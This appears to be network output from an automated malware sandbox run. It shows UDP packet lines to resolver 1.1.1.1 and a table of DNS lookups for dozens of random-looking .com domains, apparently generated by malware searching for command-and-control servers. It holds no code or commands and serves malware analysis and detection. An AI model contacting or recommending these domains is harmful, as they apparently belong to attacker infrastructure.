                                                                                                                                                                                                          Nov 11, 2024 18:25:05.407495975 CET53493121.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.408266068 CET53624291.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.408535004 CET53599031.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.409068108 CET53586861.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.410518885 CET53543791.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.416491032 CET4959453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.439413071 CET5221353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.448795080 CET53495941.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.448859930 CET53522131.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.815486908 CET6466253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.816080093 CET6057653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.829379082 CET5588353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.830329895 CET5703553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.838901043 CET53558831.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.840501070 CET6272953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.841509104 CET53570351.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.844216108 CET6382953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.845285892 CET6247153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.845824003 CET4925353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.846559048 CET5980553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.846935034 CET53605761.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.847234011 CET5508453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.847660065 CET53646621.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.847683907 CET5937253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.848846912 CET5730953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.849150896 CET6033453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.850310087 CET6352353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.850971937 CET6111753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.852881908 CET53624711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.853105068 CET5784053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.854227066 CET5759253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.854979038 CET53638291.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.855532885 CET53492531.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.856122017 CET53550841.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.858500957 CET53573091.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.858598948 CET53598051.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.861035109 CET53611171.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.861452103 CET53575921.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.863414049 CET53578401.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.873771906 CET53627291.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.878551960 CET6313153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.878997087 CET6009553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.880013943 CET53603341.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.880599022 CET53593721.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.881402016 CET5278953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.881630898 CET5237153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.881689072 CET53635231.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.883127928 CET5443153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.888860941 CET53600951.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.890772104 CET53527891.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.892844915 CET53523711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.896398067 CET5387553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.896639109 CET5489353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.896789074 CET6214753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.896943092 CET5206153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.897089005 CET6279753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.897238016 CET5349553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.897382021 CET6245653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.897521973 CET5436753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.897670984 CET5351253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.897838116 CET5356053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.897995949 CET6486753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.898221970 CET6155053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.899300098 CET5150553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.900965929 CET5769453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.902208090 CET6155153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.902615070 CET5536453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.904865026 CET53535601.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.905585051 CET53615501.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.905914068 CET5593753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.905971050 CET53538751.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.906243086 CET53548931.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.906382084 CET53621471.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.907018900 CET53520611.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.907164097 CET53627971.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.907286882 CET53624561.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.909492016 CET53631311.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.910059929 CET53515051.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.913081884 CET53615511.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.914230108 CET53544311.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.915333033 CET53559371.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.916367054 CET53648671.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.929171085 CET53535121.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.929186106 CET53534951.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.930310965 CET53543671.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.932812929 CET53553641.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.933104992 CET53576941.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.936047077 CET5493553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.969197035 CET53549351.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.037672043 CET6194553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.037995100 CET5893253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.039777994 CET6026553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.047656059 CET53602651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.047770977 CET53589321.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.071130037 CET53619451.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.093453884 CET5805553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.095330954 CET5449653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.095972061 CET5662153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.096726894 CET5720553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.098848104 CET4954053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.277544022 CET53639171.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.278758049 CET53587741.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.281116009 CET53547611.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.285027027 CET53543421.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.296744108 CET53493191.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.300753117 CET6265453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.304682016 CET6185653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.304819107 CET53521001.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.304974079 CET5213653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.311256886 CET5156853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.312716007 CET6219953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.314990044 CET53618561.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.316940069 CET5376253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.328619003 CET53537621.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.334131002 CET5734453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.336460114 CET53626541.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.336508989 CET53521361.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.343678951 CET53515681.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.344980001 CET53621991.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.345004082 CET5932353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.347970009 CET53638801.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.348155022 CET5666553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.350640059 CET6225553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.353348017 CET53573441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.362140894 CET53622551.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.371795893 CET6391953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.371795893 CET4998353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.372198105 CET5285353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.372639894 CET6479853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.372912884 CET5865953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.373558044 CET5574453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.373961926 CET6371853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.373961926 CET5717753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.374283075 CET6061553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.374500036 CET5107953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.374743938 CET6021453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.374947071 CET5394753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.375340939 CET5215853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.375674963 CET5260353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.377762079 CET53593231.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.381623983 CET53637181.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.381629944 CET53528531.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.382554054 CET53539471.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.382719994 CET53647981.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.383255959 CET53526031.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.384507895 CET53602141.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.384799957 CET53606151.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.392082930 CET53571771.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.392090082 CET53510791.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.396426916 CET53557441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.403115988 CET53499831.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.403858900 CET53586591.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.404027939 CET53639191.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.406135082 CET6318253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.406739950 CET5218053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.406739950 CET5202853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.406979084 CET6173553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.407196045 CET5297253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.407308102 CET5894553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.407541037 CET6070453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.407541037 CET6169053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.407557011 CET5286553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.407851934 CET5114153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.407851934 CET5569953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.407851934 CET6127953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.408118010 CET6168653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.408118010 CET5529453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.408327103 CET5326553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.408576965 CET6219653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.408576965 CET5506453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.408830881 CET4990853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.408989906 CET5910953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.410247087 CET5681953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.410247087 CET6251053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.410456896 CET5487153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.411586046 CET5942153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.414680004 CET53612791.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.415659904 CET53552941.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.416290998 CET53607041.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.416296959 CET53617351.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.416497946 CET53589451.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417188883 CET53520281.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417330027 CET53591091.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417335987 CET53511411.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417547941 CET53616861.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417632103 CET53556991.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417664051 CET53529721.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417711020 CET53616901.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417819023 CET53532651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.418150902 CET53528651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.419030905 CET53550641.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.419389009 CET53621961.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.423623085 CET53631821.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.424851894 CET53548711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.428780079 CET53594211.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.436870098 CET53521801.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.440511942 CET53499081.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.440965891 CET53625101.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.441071033 CET53568191.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.541747093 CET53566651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.920490026 CET53521581.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.652163982 CET5806853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.652906895 CET5618653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.660641909 CET6461553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.663536072 CET5329553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.670610905 CET53646151.1.1.1192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.635745049 CET192.168.2.81.1.1.10x45c0Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.637389898 CET192.168.2.81.1.1.10x6984Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.639735937 CET192.168.2.81.1.1.10x323fStandard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.641026974 CET192.168.2.81.1.1.10x3c25Standard query (0)galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.642386913 CET192.168.2.81.1.1.10x8061Standard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.643124104 CET192.168.2.81.1.1.10x9cabStandard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.866209030 CET192.168.2.81.1.1.10x15a2Standard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.870208025 CET192.168.2.81.1.1.10x6448Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.878278971 CET192.168.2.81.1.1.10x1fcaStandard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.878598928 CET192.168.2.81.1.1.10x72acStandard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.880245924 CET192.168.2.81.1.1.10xba4dStandard query (0)gatyfus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.881460905 CET192.168.2.81.1.1.10x12cfStandard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.882561922 CET192.168.2.81.1.1.10xe57cStandard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.882962942 CET192.168.2.81.1.1.10x31dStandard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.883178949 CET192.168.2.81.1.1.10x2b5dStandard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.927580118 CET192.168.2.81.1.1.10x387bStandard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.927628994 CET192.168.2.81.1.1.10x80aStandard query (0)puzylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.927869081 CET192.168.2.81.1.1.10x779dStandard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.927998066 CET192.168.2.81.1.1.10x145bStandard query (0)lyvyxor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.928175926 CET192.168.2.81.1.1.10xd01aStandard query (0)vocyzit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.928265095 CET192.168.2.81.1.1.10x51adStandard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.928392887 CET192.168.2.81.1.1.10xa2d5Standard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.928879976 CET192.168.2.81.1.1.10x9350Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.929109097 CET192.168.2.81.1.1.10x4641Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.929553032 CET192.168.2.81.1.1.10x7cc3Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.929734945 CET192.168.2.81.1.1.10x163Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.930448055 CET192.168.2.81.1.1.10x906bStandard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.930636883 CET192.168.2.81.1.1.10x4d5fStandard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.930813074 CET192.168.2.81.1.1.10xa858Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.931021929 CET192.168.2.81.1.1.10xd739Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.931186914 CET192.168.2.81.1.1.10xdd21Standard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.931338072 CET192.168.2.81.1.1.10x1a95Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.940445900 CET192.168.2.81.1.1.10xd459Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.940640926 CET192.168.2.81.1.1.10x5216Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.940813065 CET192.168.2.81.1.1.10x48e7Standard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.940951109 CET192.168.2.81.1.1.10x33b0Standard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.941931009 CET192.168.2.81.1.1.10x72ecStandard query (0)qetyfuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.941996098 CET192.168.2.81.1.1.10x7b4dStandard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.942199945 CET192.168.2.81.1.1.10x46d4Standard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.942291975 CET192.168.2.81.1.1.10xbb47Standard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.943231106 CET192.168.2.81.1.1.10xd79bStandard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.943542004 CET192.168.2.81.1.1.10x289aStandard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.943717957 CET192.168.2.81.1.1.10xd676Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.943788052 CET192.168.2.81.1.1.10x6337Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.943950891 CET192.168.2.81.1.1.10x2095Standard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.944082022 CET192.168.2.81.1.1.10x7720Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.944273949 CET192.168.2.81.1.1.10xa38Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.944427013 CET192.168.2.81.1.1.10x3403Standard query (0)lymyxid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.944586992 CET192.168.2.81.1.1.10x8d59Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.944886923 CET192.168.2.81.1.1.10x24beStandard query (0)qegyhig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.944982052 CET192.168.2.81.1.1.10x39aaStandard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.945225000 CET192.168.2.81.1.1.10x1137Standard query (0)qexylup.comA (IP address)IN (0x0001)false
